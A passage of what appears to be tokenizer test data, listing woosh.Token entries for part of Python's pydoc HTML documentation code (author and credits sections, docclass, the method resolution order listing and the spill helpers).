woosh.Token(woosh.STRING, "'__author__'", 845, 27, 845, 39),
woosh.Token(woosh.OP, ')', 845, 39, 845, 40),
woosh.Token(woosh.OP, ':', 845, 40, 845, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 845, 41, 846, 0),
woosh.Token(woosh.INDENT, ' ', 846, 0, 846, 12),
woosh.Token(woosh.NAME, 'contents', 846, 12, 846, 20),
woosh.Token(woosh.OP, '=', 846, 21, 846, 22),
woosh.Token(woosh.NAME, 'self', 846, 23, 846, 27),
woosh.Token(woosh.OP, '.', 846, 27, 846, 28),
woosh.Token(woosh.NAME, 'markup', 846, 28, 846, 34),
woosh.Token(woosh.OP, '(', 846, 34, 846, 35),
woosh.Token(woosh.NAME, 'str', 846, 35, 846, 38),
woosh.Token(woosh.OP, '(', 846, 38, 846, 39),
woosh.Token(woosh.NAME, 'object', 846, 39, 846, 45),
woosh.Token(woosh.OP, '.', 846, 45, 846, 46),
woosh.Token(woosh.NAME, '__author__', 846, 46, 846, 56),
woosh.Token(woosh.OP, ')', 846, 56, 846, 57),
woosh.Token(woosh.OP, ',', 846, 57, 846, 58),
woosh.Token(woosh.NAME, 'self', 846, 59, 846, 63),
woosh.Token(woosh.OP, '.', 846, 63, 846, 64),
woosh.Token(woosh.NAME, 'preformat', 846, 64, 846, 73),
woosh.Token(woosh.OP, ')', 846, 73, 846, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 846, 74, 847, 0),
woosh.Token(woosh.NAME, 'result', 847, 12, 847, 18),
woosh.Token(woosh.OP, '=', 847, 19, 847, 20),
woosh.Token(woosh.NAME, 'result', 847, 21, 847, 27),
woosh.Token(woosh.OP, '+', 847, 28, 847, 29),
woosh.Token(woosh.NAME, 'self', 847, 30, 847, 34),
woosh.Token(woosh.OP, '.', 847, 34, 847, 35),
woosh.Token(woosh.NAME, 'bigsection', 847, 35, 847, 45),
woosh.Token(woosh.OP, '(', 847, 45, 847, 46),
woosh.Token(woosh.STRING, "'Author'", 848, 16, 848, 24),
woosh.Token(woosh.OP, ',', 848, 24, 848, 25),
woosh.Token(woosh.STRING, "'#ffffff'", 848, 26, 848, 35),
woosh.Token(woosh.OP, ',', 848, 35, 848, 36),
woosh.Token(woosh.STRING, "'#7799ee'", 848, 37, 848, 46),
woosh.Token(woosh.OP, ',', 848, 46, 848, 47),
woosh.Token(woosh.NAME, 'contents', 848, 48, 848, 56),
woosh.Token(woosh.OP, ')', 848, 56, 848, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 848, 57, 849, 0),
woosh.Token(woosh.DEDENT, ' ', 849, 0, 849, 8),
woosh.Token(woosh.NAME, 'if', 849, 8, 849, 10),
woosh.Token(woosh.NAME, 'hasattr', 849, 11, 849, 18),
woosh.Token(woosh.OP, '(', 849, 18, 849, 19),
woosh.Token(woosh.NAME, 'object', 849, 19, 849, 25),
woosh.Token(woosh.OP, ',', 849, 25, 849, 26),
woosh.Token(woosh.STRING, "'__credits__'", 849, 27, 849, 40),
woosh.Token(woosh.OP, ')', 849, 40, 849, 41),
woosh.Token(woosh.OP, ':', 849, 41, 849, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 849, 42, 850, 0),
woosh.Token(woosh.INDENT, ' ', 850, 0, 850, 12),
woosh.Token(woosh.NAME, 'contents', 850, 12, 850, 20),
woosh.Token(woosh.OP, '=', 850, 21, 850, 22),
woosh.Token(woosh.NAME, 'self', 850, 23, 850, 27),
woosh.Token(woosh.OP, '.', 850, 27, 850, 28),
woosh.Token(woosh.NAME, 'markup', 850, 28, 850, 34),
woosh.Token(woosh.OP, '(', 850, 34, 850, 35),
woosh.Token(woosh.NAME, 'str', 850, 35, 850, 38),
woosh.Token(woosh.OP, '(', 850, 38, 850, 39),
woosh.Token(woosh.NAME, 'object', 850, 39, 850, 45),
woosh.Token(woosh.OP, '.', 850, 45, 850, 46),
woosh.Token(woosh.NAME, '__credits__', 850, 46, 850, 57),
woosh.Token(woosh.OP, ')', 850, 57, 850, 58),
woosh.Token(woosh.OP, ',', 850, 58, 850, 59),
woosh.Token(woosh.NAME, 'self', 850, 60, 850, 64),
woosh.Token(woosh.OP, '.', 850, 64, 850, 65),
woosh.Token(woosh.NAME, 'preformat', 850, 65, 850, 74),
woosh.Token(woosh.OP, ')', 850, 74, 850, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 850, 75, 851, 0),
woosh.Token(woosh.NAME, 'result', 851, 12, 851, 18),
woosh.Token(woosh.OP, '=', 851, 19, 851, 20),
woosh.Token(woosh.NAME, 'result', 851, 21, 851, 27),
woosh.Token(woosh.OP, '+', 851, 28, 851, 29),
woosh.Token(woosh.NAME, 'self', 851, 30, 851, 34),
woosh.Token(woosh.OP, '.', 851, 34, 851, 35),
woosh.Token(woosh.NAME, 'bigsection', 851, 35, 851, 45),
woosh.Token(woosh.OP, '(', 851, 45, 851, 46),
woosh.Token(woosh.STRING, "'Credits'", 852, 16, 852, 25),
woosh.Token(woosh.OP, ',', 852, 25, 852, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 852, 27, 852, 36),
woosh.Token(woosh.OP, ',', 852, 36, 852, 37),
woosh.Token(woosh.STRING, "'#7799ee'", 852, 38, 852, 47),
woosh.Token(woosh.OP, ',', 852, 47, 852, 48),
woosh.Token(woosh.NAME, 'contents', 852, 49, 852, 57),
woosh.Token(woosh.OP, ')', 852, 57, 852, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 852, 58, 853, 0),
woosh.Token(woosh.DEDENT, ' ', 854, 0, 854, 8),
woosh.Token(woosh.NAME, 'return', 854, 8, 854, 14),
woosh.Token(woosh.NAME, 'result', 854, 15, 854, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 854, 21, 855, 0),
woosh.Token(woosh.DEDENT, ' ', 856, 0, 856, 4),
woosh.Token(woosh.NAME, 'def', 856, 4, 856, 7),
woosh.Token(woosh.NAME, 'docclass', 856, 8, 856, 16),
woosh.Token(woosh.OP, '(', 856, 16, 856, 17),
woosh.Token(woosh.NAME, 'self', 856, 17, 856, 21),
woosh.Token(woosh.OP, ',', 856, 21, 856, 22),
woosh.Token(woosh.NAME, 'object', 856, 23, 856, 29),
woosh.Token(woosh.OP, ',', 856, 29, 856, 30),
woosh.Token(woosh.NAME, 'name', 856, 31, 856, 35),
woosh.Token(woosh.OP, '=', 856, 35, 856, 36),
woosh.Token(woosh.NAME, 'None', 856, 36, 856, 40),
woosh.Token(woosh.OP, ',', 856, 40, 856, 41),
woosh.Token(woosh.NAME, 'mod', 856, 42, 856, 45),
woosh.Token(woosh.OP, '=', 856, 45, 856, 46),
woosh.Token(woosh.NAME, 'None', 856, 46, 856, 50),
woosh.Token(woosh.OP, ',', 856, 50, 856, 51),
woosh.Token(woosh.NAME, 'funcs', 856, 52, 856, 57),
woosh.Token(woosh.OP, '=', 856, 57, 856, 58),
woosh.Token(woosh.OP, '{', 856, 58, 856, 59),
woosh.Token(woosh.OP, '}', 856, 59, 856, 60),
woosh.Token(woosh.OP, ',', 856, 60, 856, 61),
woosh.Token(woosh.NAME, 'classes', 856, 62, 856, 69),
woosh.Token(woosh.OP, '=', 856, 69, 856, 70),
woosh.Token(woosh.OP, '{', 856, 70, 856, 71),
woosh.Token(woosh.OP, '}', 856, 71, 856, 72),
woosh.Token(woosh.OP, ',', 856, 72, 856, 73),
woosh.Token(woosh.OP, '*', 857, 17, 857, 18),
woosh.Token(woosh.NAME, 'ignored', 857, 18, 857, 25),
woosh.Token(woosh.OP, ')', 857, 25, 857, 26),
woosh.Token(woosh.OP, ':', 857, 26, 857, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 857, 27, 858, 0),
woosh.Token(woosh.INDENT, ' ', 858, 0, 858, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a class object."""', 858, 8, 858, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 858, 60, 859, 0),
woosh.Token(woosh.NAME, 'realname', 859, 8, 859, 16),
woosh.Token(woosh.OP, '=', 859, 17, 859, 18),
woosh.Token(woosh.NAME, 'object', 859, 19, 859, 25),
woosh.Token(woosh.OP, '.', 859, 25, 859, 26),
woosh.Token(woosh.NAME, '__name__', 859, 26, 859, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 859, 34, 860, 0),
woosh.Token(woosh.NAME, 'name', 860, 8, 860, 12),
woosh.Token(woosh.OP, '=', 860, 13, 860, 14),
woosh.Token(woosh.NAME, 'name', 860, 15, 860, 19),
woosh.Token(woosh.NAME, 'or', 860, 20, 860, 22),
woosh.Token(woosh.NAME, 'realname', 860, 23, 860, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 860, 31, 861, 0),
woosh.Token(woosh.NAME, 'bases', 861, 8, 861, 13),
woosh.Token(woosh.OP, '=', 861, 14, 861, 15),
woosh.Token(woosh.NAME, 'object', 861, 16, 861, 22),
woosh.Token(woosh.OP, '.', 861, 22, 861, 23),
woosh.Token(woosh.NAME, '__bases__', 861, 23, 861, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 861, 32, 862, 0),
woosh.Token(woosh.NAME, 'contents', 863, 8, 863, 16),
woosh.Token(woosh.OP, '=', 863, 17, 863, 18),
woosh.Token(woosh.OP, '[', 863, 19, 863, 20),
woosh.Token(woosh.OP, ']', 863, 20, 863, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 863, 21, 864, 0),
woosh.Token(woosh.NAME, 'push', 864, 8, 864, 12),
woosh.Token(woosh.OP, '=', 864, 13, 864, 14),
woosh.Token(woosh.NAME, 'contents', 864, 15, 864, 23),
woosh.Token(woosh.OP, '.', 864, 23, 864, 24),
woosh.Token(woosh.NAME, 'append', 864, 24, 864, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 864, 30, 865, 0),
woosh.Token(woosh.COMMENT, '# Cute little class to pump out a horizontal rule between sections.', 866, 8, 866, 75),
woosh.Token(woosh.NAME, 'class', 867, 8, 867, 13),
woosh.Token(woosh.NAME, 'HorizontalRule', 867, 14, 867, 28),
woosh.Token(woosh.OP, ':', 867, 28, 867, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 867, 29, 868, 0),
woosh.Token(woosh.INDENT, ' ', 868, 0, 868, 12),
woosh.Token(woosh.NAME, 'def', 868, 12, 868, 15),
woosh.Token(woosh.NAME, '__init__', 868, 16, 868, 24),
woosh.Token(woosh.OP, '(', 868, 24, 868, 25),
woosh.Token(woosh.NAME, 'self', 868, 25, 868, 29),
woosh.Token(woosh.OP, ')', 868, 29, 868, 30),
woosh.Token(woosh.OP, ':', 868, 30, 868, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 868, 31, 869, 0),
woosh.Token(woosh.INDENT, ' ', 869, 0, 869, 16),
woosh.Token(woosh.NAME, 'self', 869, 16, 869, 20),
woosh.Token(woosh.OP, '.', 869, 20, 869, 21),
woosh.Token(woosh.NAME, 'needone', 869, 21, 869, 28),
woosh.Token(woosh.OP, '=', 869, 29, 869, 30),
woosh.Token(woosh.NUMBER, '0', 869, 31, 869, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 869, 32, 870, 0),
woosh.Token(woosh.DEDENT, ' ', 870, 0, 870, 12),
woosh.Token(woosh.NAME, 'def', 870, 12, 870, 15),
woosh.Token(woosh.NAME, 'maybe', 870, 16, 870, 21),
woosh.Token(woosh.OP, '(', 870, 21, 870, 22),
woosh.Token(woosh.NAME, 'self', 870, 22, 870, 26),
woosh.Token(woosh.OP, ')', 870, 26, 870, 27),
woosh.Token(woosh.OP, ':', 870, 27, 870, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 870, 28, 871, 0),
woosh.Token(woosh.INDENT, ' ', 871, 0, 871, 16),
woosh.Token(woosh.NAME, 'if', 871, 16, 871, 18),
woosh.Token(woosh.NAME, 'self', 871, 19, 871, 23),
woosh.Token(woosh.OP, '.', 871, 23, 871, 24),
woosh.Token(woosh.NAME, 'needone', 871, 24, 871, 31),
woosh.Token(woosh.OP, ':', 871, 31, 871, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 871, 32, 872, 0),
woosh.Token(woosh.INDENT, ' ', 872, 0, 872, 20),
woosh.Token(woosh.NAME, 'push', 872, 20, 872, 24),
woosh.Token(woosh.OP, '(', 872, 24, 872, 25),
woosh.Token(woosh.STRING, "'<hr>\\n'", 872, 25, 872, 33),
woosh.Token(woosh.OP, ')', 872, 33, 872, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 872, 34, 873, 0),
woosh.Token(woosh.DEDENT, ' ', 873, 0, 873, 16),
woosh.Token(woosh.NAME, 'self', 873, 16, 873, 20),
woosh.Token(woosh.OP, '.', 873, 20, 873, 21),
woosh.Token(woosh.NAME, 'needone', 873, 21, 873, 28),
woosh.Token(woosh.OP, '=', 873, 29, 873, 30),
woosh.Token(woosh.NUMBER, '1', 873, 31, 873, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 873, 32, 874, 0),
woosh.Token(woosh.DEDENT, ' ', 874, 0, 874, 8),
woosh.Token(woosh.DEDENT, '', 874, 8, 874, 8),
woosh.Token(woosh.NAME, 'hr', 874, 8, 874, 10),
woosh.Token(woosh.OP, '=', 874, 11, 874, 12),
woosh.Token(woosh.NAME, 'HorizontalRule', 874, 13, 874, 27),
woosh.Token(woosh.OP, '(', 874, 27, 874, 28),
woosh.Token(woosh.OP, ')', 874, 28, 874, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 874, 29, 875, 0),
woosh.Token(woosh.COMMENT, '# List the mro, if non-trivial.', 876, 8, 876, 39),
woosh.Token(woosh.NAME, 'mro', 877, 8, 877, 11),
woosh.Token(woosh.OP, '=', 877, 12, 877, 13),
woosh.Token(woosh.NAME, 'deque', 877, 14, 877, 19),
woosh.Token(woosh.OP, '(', 877, 19, 877, 20),
woosh.Token(woosh.NAME, 'inspect', 877, 20, 877, 27),
woosh.Token(woosh.OP, '.', 877, 27, 877, 28),
woosh.Token(woosh.NAME, 'getmro', 877, 28, 877, 34),
woosh.Token(woosh.OP, '(', 877, 34, 877, 35),
woosh.Token(woosh.NAME, 'object', 877, 35, 877, 41),
woosh.Token(woosh.OP, ')', 877, 41, 877, 42),
woosh.Token(woosh.OP, ')', 877, 42, 877, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 877, 43, 878, 0),
woosh.Token(woosh.NAME, 'if', 878, 8, 878, 10),
woosh.Token(woosh.NAME, 'len', 878, 11, 878, 14),
woosh.Token(woosh.OP, '(', 878, 14, 878, 15),
woosh.Token(woosh.NAME, 'mro', 878, 15, 878, 18),
woosh.Token(woosh.OP, ')', 878, 18, 878, 19),
woosh.Token(woosh.OP, '>', 878, 20, 878, 21),
woosh.Token(woosh.NUMBER, '2', 878, 22, 878, 23),
woosh.Token(woosh.OP, ':', 878, 23, 878, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 878, 24, 879, 0),
woosh.Token(woosh.INDENT, ' ', 879, 0, 879, 12),
woosh.Token(woosh.NAME, 'hr', 879, 12, 879, 14),
woosh.Token(woosh.OP, '.', 879, 14, 879, 15),
woosh.Token(woosh.NAME, 'maybe', 879, 15, 879, 20),
woosh.Token(woosh.OP, '(', 879, 20, 879, 21),
woosh.Token(woosh.OP, ')', 879, 21, 879, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 879, 22, 880, 0),
woosh.Token(woosh.NAME, 'push', 880, 12, 880, 16),
woosh.Token(woosh.OP, '(', 880, 16, 880, 17),
woosh.Token(woosh.STRING, "'<dl><dt>Method resolution order:</dt>\\n'", 880, 17, 880, 58),
woosh.Token(woosh.OP, ')', 880, 58, 880, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 880, 59, 881, 0),
woosh.Token(woosh.NAME, 'for', 881, 12, 881, 15),
woosh.Token(woosh.NAME, 'base', 881, 16, 881, 20),
woosh.Token(woosh.NAME, 'in', 881, 21, 881, 23),
woosh.Token(woosh.NAME, 'mro', 881, 24, 881, 27),
woosh.Token(woosh.OP, ':', 881, 27, 881, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 881, 28, 882, 0),
woosh.Token(woosh.INDENT, ' ', 882, 0, 882, 16),
woosh.Token(woosh.NAME, 'push', 882, 16, 882, 20),
woosh.Token(woosh.OP, '(', 882, 20, 882, 21),
woosh.Token(woosh.STRING, "'<dd>%s</dd>\\n'", 882, 21, 882, 36),
woosh.Token(woosh.OP, '%', 882, 37, 882, 38),
woosh.Token(woosh.NAME, 'self', 882, 39, 882, 43),
woosh.Token(woosh.OP, '.', 882, 43, 882, 44),
woosh.Token(woosh.NAME, 'classlink', 882, 44, 882, 53),
woosh.Token(woosh.OP, '(', 882, 53, 882, 54),
woosh.Token(woosh.NAME, 'base', 882, 54, 882, 58),
woosh.Token(woosh.OP, ',', 882, 58, 882, 59),
woosh.Token(woosh.NAME, 'object', 883, 54, 883, 60),
woosh.Token(woosh.OP, '.', 883, 60, 883, 61),
woosh.Token(woosh.NAME, '__module__', 883, 61, 883, 71),
woosh.Token(woosh.OP, ')', 883, 71, 883, 72),
woosh.Token(woosh.OP, ')', 883, 72, 883, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 883, 73, 884, 0),
woosh.Token(woosh.DEDENT, ' ', 884, 0, 884, 12),
woosh.Token(woosh.NAME, 'push', 884, 12, 884, 16),
woosh.Token(woosh.OP, '(', 884, 16, 884, 17),
woosh.Token(woosh.STRING, "'</dl>\\n'", 884, 17, 884, 26),
woosh.Token(woosh.OP, ')', 884, 26, 884, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 884, 27, 885, 0),
woosh.Token(woosh.DEDENT, ' ', 886, 0, 886, 8),
woosh.Token(woosh.NAME, 'def', 886, 8, 886, 11),
woosh.Token(woosh.NAME, 'spill', 886, 12, 886, 17),
woosh.Token(woosh.OP, '(', 886, 17, 886, 18),
woosh.Token(woosh.NAME, 'msg', 886, 18, 886, 21),
woosh.Token(woosh.OP, ',', 886, 21, 886, 22),
woosh.Token(woosh.NAME, 'attrs', 886, 23, 886, 28),
woosh.Token(woosh.OP, ',', 886, 28, 886, 29),
woosh.Token(woosh.NAME, 'predicate', 886, 30, 886, 39),
woosh.Token(woosh.OP, ')', 886, 39, 886, 40),
woosh.Token(woosh.OP, ':', 886, 40, 886, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 886, 41, 887, 0),
woosh.Token(woosh.INDENT, ' ', 887, 0, 887, 12),
woosh.Token(woosh.NAME, 'ok', 887, 12, 887, 14),
woosh.Token(woosh.OP, ',', 887, 14, 887, 15),
woosh.Token(woosh.NAME, 'attrs', 887, 16, 887, 21),
woosh.Token(woosh.OP, '=', 887, 22, 887, 23),
woosh.Token(woosh.NAME, '_split_list', 887, 24, 887, 35),
woosh.Token(woosh.OP, '(', 887, 35, 887, 36),
woosh.Token(woosh.NAME, 'attrs', 887, 36, 887, 41),
woosh.Token(woosh.OP, ',', 887, 41, 887, 42),
woosh.Token(woosh.NAME, 'predicate', 887, 43, 887, 52),
woosh.Token(woosh.OP, ')', 887, 52, 887, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 887, 53, 888, 0),
woosh.Token(woosh.NAME, 'if', 888, 12, 888, 14),
woosh.Token(woosh.NAME, 'ok', 888, 15, 888, 17),
woosh.Token(woosh.OP, ':', 888, 17, 888, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 888, 18, 889, 0),
woosh.Token(woosh.INDENT, ' ', 889, 0, 889, 16),
woosh.Token(woosh.NAME, 'hr', 889, 16, 889, 18),
woosh.Token(woosh.OP, '.', 889, 18, 889, 19),
woosh.Token(woosh.NAME, 'maybe', 889, 19, 889, 24),
woosh.Token(woosh.OP, '(', 889, 24, 889, 25),
woosh.Token(woosh.OP, ')', 889, 25, 889, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 889, 26, 890, 0),
woosh.Token(woosh.NAME, 'push', 890, 16, 890, 20),
woosh.Token(woosh.OP, '(', 890, 20, 890, 21),
woosh.Token(woosh.NAME, 'msg', 890, 21, 890, 24),
woosh.Token(woosh.OP, ')', 890, 24, 890, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 890, 25, 891, 0),
woosh.Token(woosh.NAME, 'for', 891, 16, 891, 19),
woosh.Token(woosh.NAME, 'name', 891, 20, 891, 24),
woosh.Token(woosh.OP, ',', 891, 24, 891, 25),
woosh.Token(woosh.NAME, 'kind', 891, 26, 891, 30),
woosh.Token(woosh.OP, ',', 891, 30, 891, 31),
woosh.Token(woosh.NAME, 'homecls', 891, 32, 891, 39),
woosh.Token(woosh.OP, ',', 891, 39, 891, 40),
woosh.Token(woosh.NAME, 'value', 891, 41, 891, 46),
woosh.Token(woosh.NAME, 'in', 891, 47, 891, 49),
woosh.Token(woosh.NAME, 'ok', 891, 50, 891, 52),
woosh.Token(woosh.OP, ':', 891, 52, 891, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 891, 53, 892, 0),
woosh.Token(woosh.INDENT, ' ', 892, 0, 892, 20),
woosh.Token(woosh.NAME, 'try', 892, 20, 892, 23),
woosh.Token(woosh.OP, ':', 892, 23, 892, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 892, 24, 893, 0),
woosh.Token(woosh.INDENT, ' ', 893, 0, 893, 24),
woosh.Token(woosh.NAME, 'value', 893, 24, 893, 29),
woosh.Token(woosh.OP, '=', 893, 30, 893, 31),
woosh.Token(woosh.NAME, 'getattr', 893, 32, 893, 39),
woosh.Token(woosh.OP, '(', 893, 39, 893, 40),
woosh.Token(woosh.NAME, 'object', 893, 40, 893, 46),
woosh.Token(woosh.OP, ',', 893, 46, 893, 47),
woosh.Token(woosh.NAME, 'name', 893, 48, 893, 52),
woosh.Token(woosh.OP, ')', 893, 52, 893, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 893, 53, 894, 0),
woosh.Token(woosh.DEDENT, ' ', 894, 0, 894, 20),
woosh.Token(woosh.NAME, 'except', 894, 20, 894, 26),
woosh.Token(woosh.NAME, 'Exception', 894, 27, 894, 36),
woosh.Token(woosh.OP, ':', 894, 36, 894, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 894, 37, 895, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 895, 24, 895, 79),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 896, 24, 896, 37),
woosh.Token(woosh.INDENT, ' ', 897, 0, 897, 24),
woosh.Token(woosh.NAME, 'push', 897, 24, 897, 28),
woosh.Token(woosh.OP, '(', 897, 28, 897, 29),
woosh.Token(woosh.NAME, 'self', 897, 29, 897, 33),
woosh.Token(woosh.OP, '.', 897, 33, 897, 34),
woosh.Token(woosh.NAME, 'docdata', 897, 34, 897, 41),
woosh.Token(woosh.OP, '(', 897, 41, 897, 42),
woosh.Token(woosh.NAME, 'value', 897, 42, 897, 47),
woosh.Token(woosh.OP, ',', 897, 47, 897, 48),
woosh.Token(woosh.NAME, 'name', 897, 49, 897, 53),
woosh.Token(woosh.OP, ',', 897, 53, 897, 54),
woosh.Token(woosh.NAME, 'mod', 897, 55, 897, 58),
woosh.Token(woosh.OP, ')', 897, 58, 897, 59),
woosh.Token(woosh.OP, ')', 897, 59, 897, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 897, 60, 898, 0),
woosh.Token(woosh.DEDENT, ' ', 898, 0, 898, 20),
woosh.Token(woosh.NAME, 'else', 898, 20, 898, 24),
woosh.Token(woosh.OP, ':', 898, 24, 898, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 898, 25, 899, 0),
woosh.Token(woosh.INDENT, ' ', 899, 0, 899, 24),
woosh.Token(woosh.NAME, 'push', 899, 24, 899, 28),
woosh.Token(woosh.OP, '(', 899, 28, 899, 29),
woosh.Token(woosh.NAME, 'self', 899, 29, 899, 33),
woosh.Token(woosh.OP, '.', 899, 33, 899, 34),
woosh.Token(woosh.NAME, 'document', 899, 34, 899, 42),
woosh.Token(woosh.OP, '(', 899, 42, 899, 43),
woosh.Token(woosh.NAME, 'value', 899, 43, 899, 48),
woosh.Token(woosh.OP, ',', 899, 48, 899, 49),
woosh.Token(woosh.NAME, 'name', 899, 50, 899, 54),
woosh.Token(woosh.OP, ',', 899, 54, 899, 55),
woosh.Token(woosh.NAME, 'mod', 899, 56, 899, 59),
woosh.Token(woosh.OP, ',', 899, 59, 899, 60),
woosh.Token(woosh.NAME, 'funcs', 900, 40, 900, 45),
woosh.Token(woosh.OP, ',', 900, 45, 900, 46),
woosh.Token(woosh.NAME, 'classes', 900, 47, 900, 54),
woosh.Token(woosh.OP, ',', 900, 54, 900, 55),
woosh.Token(woosh.NAME, 'mdict', 900, 56, 900, 61),
woosh.Token(woosh.OP, ',', 900, 61, 900, 62),
woosh.Token(woosh.NAME, 'object', 900, 63, 900, 69),
woosh.Token(woosh.OP, ')', 900, 69, 900, 70),
woosh.Token(woosh.OP, ')', 900, 70, 900, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 900, 71, 901, 0),
woosh.Token(woosh.DEDENT, ' ', 901, 0, 901, 20),
woosh.Token(woosh.NAME, 'push', 901, 20, 901, 24),
woosh.Token(woosh.OP, '(', 901, 24, 901, 25),
woosh.Token(woosh.STRING, "'\\n'", 901, 25, 901, 29),
woosh.Token(woosh.OP, ')', 901, 29, 901, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 901, 30, 902, 0),
woosh.Token(woosh.DEDENT, ' ', 902, 0, 902, 12),
woosh.Token(woosh.DEDENT, '', 902, 12, 902, 12),
woosh.Token(woosh.NAME, 'return', 902, 12, 902, 18),
woosh.Token(woosh.NAME, 'attrs', 902, 19, 902, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 902, 24, 903, 0),
woosh.Token(woosh.DEDENT, ' ', 904, 0, 904, 8),
woosh.Token(woosh.NAME, 'def', 904, 8, 904, 11),
woosh.Token(woosh.NAME, 'spilldescriptors', 904, 12, 904, 28),
woosh.Token(woosh.OP, '(', 904, 28, 904, 29),
woosh.Token(woosh.NAME, 'msg', 904, 29, 904, 32),
woosh.Token(woosh.OP, ',', 904, 32, 904, 33),
woosh.Token(woosh.NAME, 'attrs', 904, 34, 904, 39),
woosh.Token(woosh.OP, ',', 904, 39, 904, 40),
woosh.Token(woosh.NAME, 'predicate', 904, 41, 904, 50),
woosh.Token(woosh.OP, ')', 904, 50, 904, 51),
woosh.Token(woosh.OP, ':', 904, 51, 904, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 904, 52, 905, 0),
woosh.Token(woosh.INDENT, ' ', 905, 0, 905, 12),
woosh.Token(woosh.NAME, 'ok', 905, 12, 905, 14),
woosh.Token(woosh.OP, ',', 905, 14, 905, 15),
woosh.Token(woosh.NAME, 'attrs', 905, 16, 905, 21),
woosh.Token(woosh.OP, '=', 905, 22, 905, 23),
woosh.Token(woosh.NAME, '_split_list', 905, 24, 905, 35),
woosh.Token(woosh.OP, '(', 905, 35, 905, 36),
woosh.Token(woosh.NAME, 'attrs', 905, 36, 905, 41),
woosh.Token(woosh.OP, ',', 905, 41, 905, 42),
woosh.Token(woosh.NAME, 'predicate', 905, 43, 905, 52),
woosh.Token(woosh.OP, ')', 905, 52, 905, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 905, 53, 906, 0),
woosh.Token(woosh.NAME, 'if', 906, 12, 906, 14),
woosh.Token(woosh.NAME, 'ok', 906, 15, 906, 17),
woosh.Token(woosh.OP, ':', 906, 17, 906, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 906, 18, 907, 0),
woosh.Token(woosh.INDENT, ' ', 907, 0, 907, 16),
woosh.Token(woosh.NAME, 'hr', 907, 16, 907, 18),
woosh.Token(woosh.OP, '.', 907, 18, 907, 19),
woosh.Token(woosh.NAME, 'maybe', 907, 19, 907, 24),
woosh.Token(woosh.OP, '(', 907, 24, 907, 25),
woosh.Token(woosh.OP, ')', 907, 25, 907, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 907, 26, 908, 0),
woosh.Token(woosh.NAME, 'push', 908, 16, 908, 20),
woosh.Token(woosh.OP, '(', 908, 20, 908, 21),
woosh.Token(woosh.NAME, 'msg', 908, 21, 908, 24),
woosh.Token(woosh.OP, ')', 908, 24, 908, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 908, 25, 909, 0),
woosh.Token(woosh.NAME, 'for', 909, 16, 909, 19),
woosh.Token(woosh.NAME, 'name', 909, 20, 909, 24),
woosh.Token(woosh.OP, ',', 909, 24, 909, 25),
woosh.Token(woosh.NAME, 'kind', 909, 26, 909, 30),
woosh.Token(woosh.OP, ',', 909, 30, 909, 31),
woosh.Token(woosh.NAME, 'homecls', 909, 32, 909, 39),
woosh.Token(woosh.OP, ',', 909, 39, 909, 40),
woosh.Token(woosh.NAME, 'value', 909, 41, 909, 46),
woosh.Token(woosh.NAME, 'in', 909, 47, 909, 49),
woosh.Token(woosh.NAME, 'ok', 909, 50, 909, 52),
woosh.Token(woosh.OP, ':', 909, 52, 909, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 909, 53, 910, 0),
woosh.Token(woosh.INDENT, ' ', 910, 0, 910, 20),
woosh.Token(woosh.NAME, 'push', 910, 20, 910, 24),
woosh.Token(woosh.OP, '(', 910, 24, 910, 25),
woosh.Token(woosh.NAME, 'self', 910, 25, 910, 29),
woosh.Token(woosh.OP, '.', 910, 29, 910, 30),
woosh.Token(woosh.NAME, 'docdata', 910, 30, 910, 37),
woosh.Token(woosh.OP, '(', 910, 37, 910, 38),
woosh.Token(woosh.NAME, 'value', 910, 38, 910, 43),
woosh.Token(woosh.OP, ',', 910, 43, 910, 44),
woosh.Token(woosh.NAME, 'name', 910, 45, 910, 49),
woosh.Token(woosh.OP, ',', 910, 49, 910, 50),
